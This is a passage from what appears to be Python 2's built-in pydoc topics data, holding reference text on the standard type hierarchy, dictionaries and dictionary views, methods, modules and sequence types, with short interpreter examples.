and\n set such attributes. *Note that the current implementation only\n supports function attributes on user-defined functions. Function\n attributes on built-in functions may be supported in the\n future.*\n\n Additional information about a function\'s definition can be\n retrieved from its code object; see the description of internal\n types below.\n\n User-defined methods\n A user-defined method object combines a class, a class instance\n (or "None") and any callable object (normally a user-defined\n function).\n\n Special read-only attributes: "im_self" is the class instance\n object, "im_func" is the function object; "im_class" is the\n class of "im_self" for bound methods or the class that asked for\n the method for unbound methods; "__doc__" is the method\'s\n documentation (same as "im_func.__doc__"); "__name__" is the\n method name (same as "im_func.__name__"); "__module__" is the\n name of the module the method was defined in, or "None" if\n unavailable.\n\n Changed in version 2.2: "im_self" used to refer to the class\n that defined the method.\n\n Changed in version 2.6: For Python 3 forward-compatibility,\n "im_func" is also available as "__func__", and "im_self" as\n "__self__".\n\n Methods also support accessing (but not setting) the arbitrary\n function attributes on the underlying function object.\n\n User-defined method objects may be created when getting an\n attribute of a class (perhaps via an instance of that class), if\n that attribute is a user-defined function object, an unbound\n user-defined method object, or a class method object. When the\n attribute is a user-defined method object, a new method object\n is only created if the class from which it is being retrieved is\n the same as, or a derived class of, the class stored in the\n original method object; otherwise, the original method object is\n used as it is.\n\n When a user-defined method object is created by retrieving a\n user-defined function object from a class, its "im_self"\n attribute is "None" and the method object is said to be unbound.\n When one is created by retrieving a user-defined function object\n from a class via one of its instances, its "im_self" attribute\n is the instance, and the method object is said to be bound. In\n either case, the new method\'s "im_class" attribute is the class\n from which the retrieval takes place, and its "im_func"\n attribute is the original function object.\n\n When a user-defined method object is created by retrieving\n another method object from a class or instance, the behaviour is\n the same as for a function object, except that the "im_func"\n attribute of the new instance is not the original method object\n but its "im_func" attribute.\n\n When a user-defined method object is created by retrieving a\n class method object from a class or instance, its "im_self"\n attribute is the class itself, and its "im_func" attribute is\n the function object underlying the class method.\n\n When an unbound user-defined method object is called, the\n underlying function ("im_func") is called, with the restriction\n that the first argument must be an instance of the proper class\n ("im_class") or of a derived class thereof.\n\n When a bound user-defined method object is called, the\n underlying function ("im_func") is called, inserting the class\n instance ("im_self") in front of the argument list. For\n instance, when "C" is a class which contains a definition for a\n function "f()", and "x" is an instance of "C", calling "x.f(1)"\n is equivalent to calling "C.f(x, 1)".\n\n When a user-defined method object is derived from a class method\n object, the "class instance" stored in "im_self" will actually\n be the class itself, so that calling either "x.f(1)" or "C.f(1)"\n is equivalent to calling "f(C,1)" where "f" is the underlying\n function.\n\n Note that the transformation from function object to (unbound or\n bound) method object happens each time the attribute is\n retrieved from the class or instance. In some cases, a fruitful\n optimization is to assign the attribute to a local variable and\n call that local variable. Also notice that this transformation\n only happens for user-defined functions; other callable objects\n (and all non-callable objects) are retrieved without\n transformation. It is also important to note that user-defined\n functions which are attributes of a class instance are not\n converted to bound methods; this *only* happens when the\n function is an attribute of the class.\n\n Generator functions\n A function or method which uses the "yield" statement (see\n section The yield statement) is called a *generator function*.\n Such a function, when called, always returns an iterator object\n which can be used to execute the body of the function: calling\n the iterator\'s "next()" method will cause the function to\n execute until it provides a value using the "yield" statement.\n When the function executes a "return" statement or falls off the\n end, a "StopIteration" exception is raised and the iterator will\n have reached the end of the set of values to be returned.\n\n Built-in functions\n A built-in function object is a wrapper around a C function.\n Examples of built-in functions are "len()" and "math.sin()"\n ("math" is a standard built-in module). The number and type of\n the arguments are determined by the C function. Special read-\n only attributes: "__doc__" is the function\'s documentation\n string, or "None" if unavailable; "__name__" is the function\'s\n name; "__self__" is set to "None" (but see the next item);\n "__module__" is the name of the module the function was defined\n in or "None" if unavailable.\n\n Built-in methods\n This is really a different disguise of a built-in function, this\n time containing an object passed to the C function as an\n implicit extra argument. An example of a built-in method is\n "alist.append()", assuming *alist* is a list object. In this\n case, the special read-only attribute "__self__" is set to the\n object denoted by *alist*.\n\n Class Types\n Class types, or "new-style classes," are callable. These\n objects normally act as factories for new instances of\n themselves, but variations are possible for class types that\n override "__new__()". The arguments of the call are passed to\n "__new__()" and, in the typical case, to "__init__()" to\n initialize the new instance.\n\n Classic Classes\n Class objects are described below. When a class object is\n called, a new class instance (also described below) is created\n and returned. This implies a call to the class\'s "__init__()"\n method if it has one. Any arguments are passed on to the\n "__init__()" method. If there is no "__init__()" method, the\n class must be called without arguments.\n\n Class instances\n Class instances are described below. Class instances are\n callable only when the class has a "__call__()" method;\n "x(arguments)" is a shorthand for "x.__call__(arguments)".\n\nModules\n Modules are imported by the "import" statement (see section The\n import statement). A module object has a namespace implemented by a\n dictionary object (this is the dictionary referenced by the\n func_globals attribute of functions defined in the module).\n Attribute references are translated to lookups in this dictionary,\n e.g., "m.x" is equivalent to "m.__dict__["x"]". A module object\n does not contain the code object used to initialize the module\n (since it isn\'t needed once the initialization is done).\n\n Attribute assignment updates the module\'s namespace dictionary,\n e.g., "m.x = 1" is equivalent to "m.__dict__["x"] = 1".\n\n Special read-only attribute: "__dict__" is the module\'s namespace\n as a dictionary object.\n\n **CPython implementation detail:** Because of the way CPython\n clears module dictionaries, the module dictionary will be cleared\n when the module falls out of scope even if the dictionary still has\n live references. To avoid this, copy the dictionary or keep the\n module around while using its dictionary directly.\n\n Predefined (writable) attributes: "__name__" is the module\'s name;\n "__doc__" is the module\'s documentation string, or "None" if\n unavailable; "__file__" is the pathname of the file from which the\n module was loaded, if it was loaded from a file. The "__file__"\n attribute is not present for C modules that are statically linked\n into the interpreter; for extension modules loaded dynamically from\n a shared library, it is the pathname of the shared library file.\n\nClasses\n Both class types (new-style classes) and class objects (old-\n style/classic classes) are typically created by class definitions\n (see section Class definitions). A class has a namespace\n implemented by a dictionary object. Class attribute references are\n translated to lookups in this dictionary, e.g., "C.x" is translated\n to "C.__dict__["x"]" (although for new-style classes in particular\n there are a number of hooks which allow for other means of locating\n attributes). When the attribute name is not found there, the\n attribute search continues in the base classes. For old-style\n classes, the search is depth-first, left-to-right in the order of\n occurrence in the base class list. New-style classes use the more\n complex C3 method resolution order which behaves correctly even in\n the presence of \'diamond\' inheritance structures where there are\n multiple inheritance paths leading back to a common ancestor.\n Additional details on the C3 MRO used by new-style classes can be\n found in the documentation accompanying the 2.3 release at\n https://www.python.org/download/releases/2.3/mro/.\n\n When a class attribute reference (for class "C", say) would yield a\n user-defined function object or an unbound user-defined method\n object whose associated class is either "C" or one of its base\n classes, it is transformed into an unbound user-defined method\n object whose "im_class" attribute is "C". When it would yield a\n class method object, it is transformed into a bound user-defined\n method object whose "im_self" attribute is "C". When it would\n yield a static method object, it is transformed into the object\n wrapped by the static method object. See section Implementing\n Descriptors for another way in which attributes retrieved from a\n class may differ from those actually contained in its "__dict__"\n (note that only new-style classes support descriptors).\n\n Class attribute assignments update the class\'s dictionary, never\n the dictionary of a base class.\n\n A class object can be called (see above) to yield a class instance\n (see below).\n\n Special attributes: "__name__" is the class name; "__module__" is\n the module name in which the class was defined; "__dict__" is the\n dictionary containing the class\'s namespace; "__bases__" is a tuple\n (possibly empty or a singleton) containing the base classes, in the\n order of their occurrence in the base class list; "__doc__" is the\n class\'s documentation string, or None if undefined.\n\nClass instances\n A class instance is created by calling a class object (see above).\n A class instance has a namespace implemented as a dictionary which\n is the first place in which attribute references are searched.\n When an attribute is not found there, and the instance\'s class has\n an attribute by that name, the search continues with the class\n attributes. If a class attribute is found that is a user-defined\n function object or an unbound user-defined method object whose\n associated class is the class (call it "C") of the instance for\n which the attribute reference was initiated or one of its bases, it\n is transformed into a bound user-defined method object whose\n "im_class" attribute is "C" and whose "im_self" attribute is the\n instance. Static method and class method objects are also\n transformed, as if they had been retrieved from class "C"; see\n above under "Classes". See section Implementing Descriptors for\n another way in which attributes of a class retrieved via its\n instances may differ from the objects actually stored in the\n class\'s "__dict__". If no class attribute is found, and the\n object\'s class has a "__getattr__()" method, that is called to\n satisfy the lookup.\n\n Attribute assignments and deletions update the instance\'s\n dictionary, never a class\'s dictionary. If the class has a\n "__setattr__()" or "__delattr__()" method, this is called instead\n of updating the instance dictionary directly.\n\n Class instances can pretend to be numbers, sequences, or mappings\n if they have methods with certain special names. See section\n Special method names.\n\n Special attributes: "__dict__" is the attribute dictionary;\n "__class__" is the instance\'s class.\n\nFiles\n A file object represents an open file. File objects are created by\n the "open()" built-in function, and also by "os.popen()",\n "os.fdopen()", and the "makefile()" method of socket objects (and\n perhaps by other functions or methods provided by extension\n modules). The objects "sys.stdin", "sys.stdout" and "sys.stderr"\n are initialized to file objects corresponding to the interpreter\'s\n standard input, output and error streams. See File Objects for\n complete documentation of file objects.\n\nInternal types\n A few types used internally by the interpreter are exposed to the\n user. Their definitions may change with future versions of the\n interpreter, but they are mentioned here for completeness.\n\n Code objects\n Code objects represent *byte-compiled* executable Python code,\n or *bytecode*. The difference between a code object and a\n function object is that the function object contains an explicit\n reference to the function\'s globals (the module in which it was\n defined), while a code object contains no context; also the\n default argument values are stored in the function object, not\n in the code object (because they represent values calculated at\n run-time). Unlike function objects, code objects are immutable\n and contain no references (directly or indirectly) to mutable\n objects.\n\n Special read-only attributes: "co_name" gives the function name;\n "co_argcount" is the number of positional arguments (including\n arguments with default values); "co_nlocals" is the number of\n local variables used by the function (including arguments);\n "co_varnames" is a tuple containing the names of the local\n variables (starting with the argument names); "co_cellvars" is a\n tuple containing the names of local variables that are\n referenced by nested functions; "co_freevars" is a tuple\n containing the names of free variables; "co_code" is a string\n representing the sequence of bytecode instructions; "co_consts"\n is a tuple containing the literals used by the bytecode;\n "co_names" is a tuple containing the names used by the bytecode;\n "co_filename" is the filename from which the code was compiled;\n "co_firstlineno" is the first line number of the function;\n "co_lnotab" is a string encoding the mapping from bytecode\n offsets to line numbers (for details see the source code of the\n interpreter); "co_stacksize" is the required stack size\n (including local variables); "co_flags" is an integer encoding a\n number of flags for the interpreter.\n\n The following flag bits are defined for "co_flags": bit "0x04"\n is set if the function uses the "*arguments" syntax to accept an\n arbitrary number of positional arguments; bit "0x08" is set if\n the function uses the "**keywords" syntax to accept arbitrary\n keyword arguments; bit "0x20" is set if the function is a\n generator.\n\n Future feature declarations ("from __future__ import division")\n also use bits in "co_flags" to indicate whether a code object\n was compiled with a particular feature enabled: bit "0x2000" is\n set if the function was compiled with future division enabled;\n bits "0x10" and "0x1000" were used in earlier versions of\n Python.\n\n Other bits in "co_flags" are reserved for internal use.\n\n If a code object represents a function, the first item in\n "co_consts" is the documentation string of the function, or\n "None" if undefined.\n\n Frame objects\n Frame objects represent execution frames. They may occur in\n traceback objects (see below).\n\n Special read-only attributes: "f_back" is to the previous stack\n frame (towards the caller), or "None" if this is the bottom\n stack frame; "f_code" is the code object being executed in this\n frame; "f_locals" is the dictionary used to look up local\n variables; "f_globals" is used for global variables;\n "f_builtins" is used for built-in (intrinsic) names;\n "f_restricted" is a flag indicating whether the function is\n executing in restricted execution mode; "f_lasti" gives the\n precise instruction (this is an index into the bytecode string\n of the code object).\n\n Special writable attributes: "f_trace", if not "None", is a\n function called at the start of each source code line (this is\n used by the debugger); "f_exc_type", "f_exc_value",\n "f_exc_traceback" represent the last exception raised in the\n parent frame provided another exception was ever raised in the\n current frame (in all other cases they are None); "f_lineno" is\n the current line number of the frame --- writing to this from\n within a trace function jumps to the given line (only for the\n bottom-most frame). A debugger can implement a Jump command\n (aka Set Next Statement) by writing to f_lineno.\n\n Traceback objects\n Traceback objects represent a stack trace of an exception. A\n traceback object is created when an exception occurs. When the\n search for an exception handler unwinds the execution stack, at\n each unwound level a traceback object is inserted in front of\n the current traceback. When an exception handler is entered,\n the stack trace is made available to the program. (See section\n The try statement.) It is accessible as "sys.exc_traceback", and\n also as the third item of the tuple returned by\n "sys.exc_info()". The latter is the preferred interface, since\n it works correctly when the program is using multiple threads.\n When the program contains no suitable handler, the stack trace\n is written (nicely formatted) to the standard error stream; if\n the interpreter is interactive, it is also made available to the\n user as "sys.last_traceback".\n\n Special read-only attributes: "tb_next" is the next level in the\n stack trace (towards the frame where the exception occurred), or\n "None" if there is no next level; "tb_frame" points to the\n execution frame of the current level; "tb_lineno" gives the line\n number where the exception occurred; "tb_lasti" indicates the\n precise instruction. The line number and last instruction in\n the traceback may differ from the line number of its frame\n object if the exception occurred in a "try" statement with no\n matching except clause or with a finally clause.\n\n Slice objects\n Slice objects are used to represent slices when *extended slice\n syntax* is used. This is a slice using two colons, or multiple\n slices or ellipses separated by commas, e.g., "a[i:j:step]",\n "a[i:j, k:l]", or "a[..., i:j]". They are also created by the\n built-in "slice()" function.\n\n Special read-only attributes: "start" is the lower bound; "stop"\n is the upper bound; "step" is the step value; each is "None" if\n omitted. These attributes can have any type.\n\n Slice objects support one method:\n\n slice.indices(self, length)\n\n This method takes a single integer argument *length* and\n computes information about the extended slice that the slice\n object would describe if applied to a sequence of *length*\n items. It returns a tuple of three integers; respectively\n these are the *start* and *stop* indices and the *step* or\n stride length of the slice. Missing or out-of-bounds indices\n are handled in a manner consistent with regular slices.\n\n New in version 2.3.\n\n Static method objects\n Static method objects provide a way of defeating the\n transformation of function objects to method objects described\n above. A static method object is a wrapper around any other\n object, usually a user-defined method object. When a static\n method object is retrieved from a class or a class instance, the\n object actually returned is the wrapped object, which is not\n subject to any further transformation. Static method objects are\n not themselves callable, although the objects they wrap usually\n are. Static method objects are created by the built-in\n "staticmethod()" constructor.\n\n Class method objects\n A class method object, like a static method object, is a wrapper\n around another object that alters the way in which that object\n is retrieved from classes and class instances. The behaviour of\n class method objects upon such retrieval is described above,\n under "User-defined methods". Class method objects are created\n by the built-in "classmethod()" constructor.\n', 'typesfunctions': u'\nFunctions\n*********\n\nFunction objects are created by function definitions. The only\noperation on a function object is to call it: "func(argument-list)".\n\nThere are really two flavors of function objects: built-in functions\nand user-defined functions. Both support the same operation (to call\nthe function), but the implementation is different, hence the\ndifferent object types.\n\nSee Function definitions for more information.\n', 'typesmapping': u'\nMapping Types --- "dict"\n************************\n\nA *mapping* object maps *hashable* values to arbitrary objects.\nMappings are mutable objects. There is currently only one standard\nmapping type, the *dictionary*. (For other containers see the built\nin "list", "set", and "tuple" classes, and the "collections" module.)\n\nA dictionary\'s keys are *almost* arbitrary values. Values that are\nnot *hashable*, that is, values containing lists, dictionaries or\nother mutable types (that are compared by value rather than by object\nidentity) may not be used as keys. Numeric types used for keys obey\nthe normal rules for numeric comparison: if two numbers compare equal\n(such as "1" and "1.0") then they can be used interchangeably to index\nthe same dictionary entry. (Note however, that since computers store\nfloating-point numbers as approximations it is usually unwise to use\nthem as dictionary keys.)\n\nDictionaries can be created by placing a comma-separated list of "key:\nvalue" pairs within braces, for example: "{\'jack\': 4098, \'sjoerd\':\n4127}" or "{4098: \'jack\', 4127: \'sjoerd\'}", or by the "dict"\nconstructor.\n\nclass dict(**kwarg)\nclass dict(mapping, **kwarg)\nclass dict(iterable, **kwarg)\n\n Return a new dictionary initialized from an optional positional\n argument and a possibly empty set of keyword arguments.\n\n If no positional argument is given, an empty dictionary is created.\n If a positional argument is given and it is a mapping object, a\n dictionary is created with the same key-value pairs as the mapping\n object. Otherwise, the positional argument must be an *iterable*\n object. Each item in the iterable must itself be an iterable with\n exactly two objects. The first object of each item becomes a key\n in the new dictionary, and the second object the corresponding\n value. If a key occurs more than once, the last value for that key\n becomes the corresponding value in the new dictionary.\n\n If keyword arguments are given, the keyword arguments and their\n values are added to the dictionary created from the positional\n argument. If a key being added is already present, the value from\n the keyword argument replaces the value from the positional\n argument.\n\n To illustrate, the following examples all return a dictionary equal\n to "{"one": 1, "two": 2, "three": 3}":\n\n >>> a = dict(one=1, two=2, three=3)\n >>> b = {\'one\': 1, \'two\': 2, \'three\': 3}\n >>> c = dict(zip([\'one\', \'two\', \'three\'], [1, 2, 3]))\n >>> d = dict([(\'two\', 2), (\'one\', 1), (\'three\', 3)])\n >>> e = dict({\'three\': 3, \'one\': 1, \'two\': 2})\n >>> a == b == c == d == e\n True\n\n Providing keyword arguments as in the first example only works for\n keys that are valid Python identifiers. Otherwise, any valid keys\n can be used.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for building a dictionary from\n keyword arguments added.\n\n These are the operations that dictionaries support (and therefore,\n custom mapping types should support too):\n\n len(d)\n\n Return the number of items in the dictionary *d*.\n\n d[key]\n\n Return the item of *d* with key *key*. Raises a "KeyError" if\n *key* is not in the map.\n\n If a subclass of dict defines a method "__missing__()" and *key*\n is not present, the "d[key]" operation calls that method with\n the key *key* as argument. The "d[key]" operation then returns\n or raises whatever is returned or raised by the\n "__missing__(key)" call. No other operations or methods invoke\n "__missing__()". If "__missing__()" is not defined, "KeyError"\n is raised. "__missing__()" must be a method; it cannot be an\n instance variable:\n\n >>> class Counter(dict):\n ... def __missing__(self, key):\n ... return 0\n >>> c = Counter()\n >>> c[\'red\']\n 0\n >>> c[\'red\'] += 1\n >>> c[\'red\']\n 1\n\n The example above shows part of the implementation of\n "collections.Counter". A different "__missing__" method is used\n by "collections.defaultdict".\n\n New in version 2.5: Recognition of __missing__ methods of dict\n subclasses.\n\n d[key] = value\n\n Set "d[key]" to *value*.\n\n del d[key]\n\n Remove "d[key]" from *d*. Raises a "KeyError" if *key* is not\n in the map.\n\n key in d\n\n Return "True" if *d* has a key *key*, else "False".\n\n New in version 2.2.\n\n key not in d\n\n Equivalent to "not key in d".\n\n New in version 2.2.\n\n iter(d)\n\n Return an iterator over the keys of the dictionary. This is a\n shortcut for "iterkeys()".\n\n clear()\n\n Remove all items from the dictionary.\n\n copy()\n\n Return a shallow copy of the dictionary.\n\n fromkeys(seq[, value])\n\n Create a new dictionary with keys from *seq* and values set to\n *value*.\n\n "fromkeys()" is a class method that returns a new dictionary.\n *value* defaults to "None".\n\n New in version 2.3.\n\n get(key[, default])\n\n Return the value for *key* if *key* is in the dictionary, else\n *default*. If *default* is not given, it defaults to "None", so\n that this method never raises a "KeyError".\n\n has_key(key)\n\n Test for the presence of *key* in the dictionary. "has_key()"\n is deprecated in favor of "key in d".\n\n items()\n\n Return a copy of the dictionary\'s list of "(key, value)" pairs.\n\n **CPython implementation detail:** Keys and values are listed in\n an arbitrary order which is non-random, varies across Python\n implementations, and depends on the dictionary\'s history of\n insertions and deletions.\n\n If "items()", "keys()", "values()", "iteritems()", "iterkeys()",\n and "itervalues()" are called with no intervening modifications\n to the dictionary, the lists will directly correspond. This\n allows the creation of "(value, key)" pairs using "zip()":\n "pairs = zip(d.values(), d.keys())". The same relationship\n holds for the "iterkeys()" and "itervalues()" methods: "pairs =\n zip(d.itervalues(), d.iterkeys())" provides the same value for\n "pairs". Another way to create the same list is "pairs = [(v, k)\n for (k, v) in d.iteritems()]".\n\n iteritems()\n\n Return an iterator over the dictionary\'s "(key, value)" pairs.\n See the note for "dict.items()".\n\n Using "iteritems()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n iterkeys()\n\n Return an iterator over the dictionary\'s keys. See the note for\n "dict.items()".\n\n Using "iterkeys()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n itervalues()\n\n Return an iterator over the dictionary\'s values. See the note\n for "dict.items()".\n\n Using "itervalues()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n keys()\n\n Return a copy of the dictionary\'s list of keys. See the note\n for "dict.items()".\n\n pop(key[, default])\n\n If *key* is in the dictionary, remove it and return its value,\n else return *default*. If *default* is not given and *key* is\n not in the dictionary, a "KeyError" is raised.\n\n New in version 2.3.\n\n popitem()\n\n Remove and return an arbitrary "(key, value)" pair from the\n dictionary.\n\n "popitem()" is useful to destructively iterate over a\n dictionary, as often used in set algorithms. If the dictionary\n is empty, calling "popitem()" raises a "KeyError".\n\n setdefault(key[, default])\n\n If *key* is in the dictionary, return its value. If not, insert\n *key* with a value of *default* and return *default*. *default*\n defaults to "None".\n\n update([other])\n\n Update the dictionary with the key/value pairs from *other*,\n overwriting existing keys. Return "None".\n\n "update()" accepts either another dictionary object or an\n iterable of key/value pairs (as tuples or other iterables of\n length two). If keyword arguments are specified, the dictionary\n is then updated with those key/value pairs: "d.update(red=1,\n blue=2)".\n\n Changed in version 2.4: Allowed the argument to be an iterable\n of key/value pairs and allowed keyword arguments.\n\n values()\n\n Return a copy of the dictionary\'s list of values. See the note\n for "dict.items()".\n\n viewitems()\n\n Return a new view of the dictionary\'s items ("(key, value)"\n pairs). See below for documentation of view objects.\n\n New in version 2.7.\n\n viewkeys()\n\n Return a new view of the dictionary\'s keys. See below for\n documentation of view objects.\n\n New in version 2.7.\n\n viewvalues()\n\n Return a new view of the dictionary\'s values. See below for\n documentation of view objects.\n\n New in version 2.7.\n\n Dictionaries compare equal if and only if they have the same "(key,\n value)" pairs.\n\n\nDictionary view objects\n=======================\n\nThe objects returned by "dict.viewkeys()", "dict.viewvalues()" and\n"dict.viewitems()" are *view objects*. They provide a dynamic view on\nthe dictionary\'s entries, which means that when the dictionary\nchanges, the view reflects these changes.\n\nDictionary views can be iterated over to yield their respective data,\nand support membership tests:\n\nlen(dictview)\n\n Return the number of entries in the dictionary.\n\niter(dictview)\n\n Return an iterator over the keys, values or items (represented as\n tuples of "(key, value)") in the dictionary.\n\n Keys and values are iterated over in an arbitrary order which is\n non-random, varies across Python implementations, and depends on\n the dictionary\'s history of insertions and deletions. If keys,\n values and items views are iterated over with no intervening\n modifications to the dictionary, the order of items will directly\n correspond. This allows the creation of "(value, key)" pairs using\n "zip()": "pairs = zip(d.values(), d.keys())". Another way to\n create the same list is "pairs = [(v, k) for (k, v) in d.items()]".\n\n Iterating views while adding or deleting entries in the dictionary\n may raise a "RuntimeError" or fail to iterate over all entries.\n\nx in dictview\n\n Return "True" if *x* is in the underlying dictionary\'s keys, values\n or items (in the latter case, *x* should be a "(key, value)"\n tuple).\n\nKeys views are set-like since their entries are unique and hashable.\nIf all values are hashable, so that (key, value) pairs are unique and\nhashable, then the items view is also set-like. (Values views are not\ntreated as set-like since the entries are generally not unique.) Then\nthese set operations are available ("other" refers either to another\nview or a set):\n\ndictview & other\n\n Return the intersection of the dictview and the other object as a\n new set.\n\ndictview | other\n\n Return the union of the dictview and the other object as a new set.\n\ndictview - other\n\n Return the difference between the dictview and the other object\n (all elements in *dictview* that aren\'t in *other*) as a new set.\n\ndictview ^ other\n\n Return the symmetric difference (all elements either in *dictview*\n or *other*, but not in both) of the dictview and the other object\n as a new set.\n\nAn example of dictionary view usage:\n\n >>> dishes = {\'eggs\': 2, \'sausage\': 1, \'bacon\': 1, \'spam\': 500}\n >>> keys = dishes.viewkeys()\n >>> values = dishes.viewvalues()\n\n >>> # iteration\n >>> n = 0\n >>> for val in values:\n ... n += val\n >>> print(n)\n 504\n\n >>> # keys and values are iterated over in the same order\n >>> list(keys)\n [\'eggs\', \'bacon\', \'sausage\', \'spam\']\n >>> list(values)\n [2, 1, 1, 500]\n\n >>> # view objects are dynamic and reflect dict changes\n >>> del dishes[\'eggs\']\n >>> del dishes[\'sausage\']\n >>> list(keys)\n [\'spam\', \'bacon\']\n\n >>> # set operations\n >>> keys & {\'eggs\', \'bacon\', \'salad\'}\n {\'bacon\'}\n', 'typesmethods': u'\nMethods\n*******\n\nMethods are functions that are called using the attribute notation.\nThere are two flavors: built-in methods (such as "append()" on lists)\nand class instance methods. Built-in methods are described with the\ntypes that support them.\n\nThe implementation adds two special read-only attributes to class\ninstance methods: "m.im_self" is the object on which the method\noperates, and "m.im_func" is the function implementing the method.\nCalling "m(arg-1, arg-2, ..., arg-n)" is completely equivalent to\ncalling "m.im_func(m.im_self, arg-1, arg-2, ..., arg-n)".\n\nClass instance methods are either *bound* or *unbound*, referring to\nwhether the method was accessed through an instance or a class,\nrespectively. When a method is unbound, its "im_self" attribute will\nbe "None" and if called, an explicit "self" object must be passed as\nthe first argument. In this case, "self" must be an instance of the\nunbound method\'s class (or a subclass of that class), otherwise a\n"TypeError" is raised.\n\nLike function objects, methods objects support getting arbitrary\nattributes. However, since method attributes are actually stored on\nthe underlying function object ("meth.im_func"), setting method\nattributes on either bound or unbound methods is disallowed.\nAttempting to set an attribute on a method results in an\n"AttributeError" being raised. In order to set a method attribute,\nyou need to explicitly set it on the underlying function object:\n\n >>> class C:\n ... def method(self):\n ... pass\n ...\n >>> c = C()\n >>> c.method.whoami = \'my name is method\' # can\'t set on the method\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n AttributeError: \'instancemethod\' object has no attribute \'whoami\'\n >>> c.method.im_func.whoami = \'my name is method\'\n >>> c.method.whoami\n \'my name is method\'\n\nSee The standard type hierarchy for more information.\n', 'typesmodules': u'\nModules\n*******\n\nThe only special operation on a module is attribute access: "m.name",\nwhere *m* is a module and *name* accesses a name defined in *m*\'s\nsymbol table. Module attributes can be assigned to. (Note that the\n"import" statement is not, strictly speaking, an operation on a module\nobject; "import foo" does not require a module object named *foo* to\nexist, rather it requires an (external) *definition* for a module\nnamed *foo* somewhere.)\n\nA special attribute of every module is "__dict__". This is the\ndictionary containing the module\'s symbol table. Modifying this\ndictionary will actually change the module\'s symbol table, but direct\nassignment to the "__dict__" attribute is not possible (you can write\n"m.__dict__[\'a\'] = 1", which defines "m.a" to be "1", but you can\'t\nwrite "m.__dict__ = {}"). Modifying "__dict__" directly is not\nrecommended.\n\nModules built into the interpreter are written like this: "<module\n\'sys\' (built-in)>". If loaded from a file, they are written as\n"<module \'os\' from \'/usr/local/lib/pythonX.Y/os.pyc\'>".\n', 'typesseq': u'\nSequence Types --- "str", "unicode", "list", "tuple", "bytearray", "buffer", "xrange"\n*************************************************************************************\n\nThere are seven sequence types: strings, Unicode strings, lists,\ntuples, bytearrays, buffers, and xrange objects.\n\nFor other containers see the built in "dict" and "set" classes, and\nthe "collections" module.\n\nString literals are written in single or double quotes: "\'xyzzy\'",\n""frobozz"". See String literals for more about string literals.\nUnicode strings are much like strings, but are specified in the syntax\nusing a preceding "\'u\'" character: "u\'abc\'", "u"def"". In addition to\nthe functionality described here, there are also string-specific\nmethods described in the String Methods section. Lists are constructed\nwith square brackets, separating items with commas: "[a, b, c]".\nTuples are constructed by the comma operator (not within square\nbrackets), with or without enclosing parentheses, but an empty tuple\nmust have the enclosing parentheses, such as "a, b, c" or "()". A\nsingle item tuple must have a trailing comma, such as "(d,)".\n\nBytearray objects are created with the built-in function\n"bytearray()".\n\nBuffer objects are not directly supported by Python syntax, but can be\ncreated by calling the built-in function "buffer()". They don\'t\nsupport concatenation or repetition.\n\nObjects of type xrange are similar to buffers in that there is no\nspecific syntax to create them, but they are created using the\n"xrange()" function. They don\'t support slicing, concatenation or\nrepetition, and using "in", "not in", "min()" or "max()" on them is\ninefficient.\n\nMost sequence types support the following operations. The "in" and\n"not in" operations have the same priorities as the comparison\noperations. The "+" and "*" operations have the same priority as the\ncorresponding numeric operations. [3] Additional methods are provided\nfor Mutable Sequence Types.\n\nThis table lists the sequence operations sorted in ascending priority.\nIn the table, *s* and *t* are sequences of the same type; *n*, *i* and\n*j* are integers:\n\n+--------------------+----------------------------------+------------+\n| Operation | Result | Notes |\n+====================+==================================+============+\n| "x in s" | "True" if an item of *s* is | (1) |\n| | equal to *x*, else "False" | |\n+--------------------+----------------------------------+------------+\n| "x not in s" | "False" if an item of *s* is | (1) |\n| | equal to *x*, else "True" | |\n+--------------------+----------------------------------+------------+\n| "s + t" | the concatenation of *s* and *t* | (6) |\n+--------------------+----------------------------------+------------+\n| "s * n, n * s" | equivalent to adding *s* to | (2) |\n| | itself *n* times | |\n+--------------------+----------------------------------+------------+\n| "s[i]" | *i*th item of *s*, origin 0 | (3) |\n+--------------------+----------------------------------+------------+\n| "s[i:j]" | slice of *s* from *i* to *j* | (3)(4) |\n+--------------------+----------------------------------+------------+\n| "s[i:j:k]" | slice of *s* from *i* to *j* | (3)(5) |\n| | with step *k* | |\n+--------------------+----------------------------------+------------+\n| "len(s)" | length of *s* | |\n+--------------------+----------------------------------+------------+\n| "min(s)" | smallest item of *s* | |\n+--------------------+----------------------------------+------------+\n| "max(s)" | largest item of *s* | |\n+--------------------+----------------------------------+------------+\n| "s.index(x)" | index of the first occurrence of | |\n| | *x* in *s* | |\n+--------------------+----------------------------------+------------+\n| "s.count(x)" | total number of occurrences of | |\n| | *x* in *s* | |\n+--------------------+----------------------------------+------------+\n\nSequence types also support comparisons. In particular, tuples and\nlists are compared lexicographically by comparing corresponding\nelements. This means that to compare equal, every element must compare\nequal and the two sequences must be of the same type and have the same\nlength. (For full details see Comparisons in the language reference.)\n\nNotes:\n\n1. When *s* is a string or Unicode string object the "in" and "not\n in" operations act like a substring test. In Python versions\n before 2.3, *x* had to be a string of length 1. In Python 2.3 and\n beyond, *x* may be a string of any length.\n\n2. Values of *n* less than "0" are treated as "0" (which yields an\n empty sequence of the same type as *s*). Note that items in the\n sequence *s* are not copied; they are referenced multiple times.\n This often haunts new Python programmers; consider:\n\n >>> lists = [[]] * 3\n >>> lists\n [[], [], []]\n >>> lists[0].append(3)\n >>> lists\n [[3], [3], [3]]\n\n What has happened is that "[[]]" is a one-element list containing\n an empty list, so all three elements of "[[]] * 3" are references\n to this single empty list. Modifying any of the elements of\n "lists" modifies this single list. You can create a list of\n different lists this way:\n\n >>> lists = [[] for i in range(3)]\n >>> lists[0].append(3)\n >>> lists[1].append(5)\n >>> lists[2].append(7)\n >>> lists\n [[3], [5], [7]]\n\n Further explanation is available in the FAQ entry How do I create a\n multidimensional list?.\n\n3. If *i* or *j* is negative, the index is relative to the end of\n the string: "len(s) + i" or "len(s) + j" is substituted. But note\n that "-0" is still "0".\n\n4. The slice of *s* from *i* to *j* is defined as the sequence of\n items with index *k* such that "i <= k < j". If *i* or *j* is\n greater than "len(s)", use "len(s)". If *i* is omitted or "None",\n use "0". If *j* is omitted or "None", use "len(s)". If *i* is\n greater than or equal to *j*, the slice is 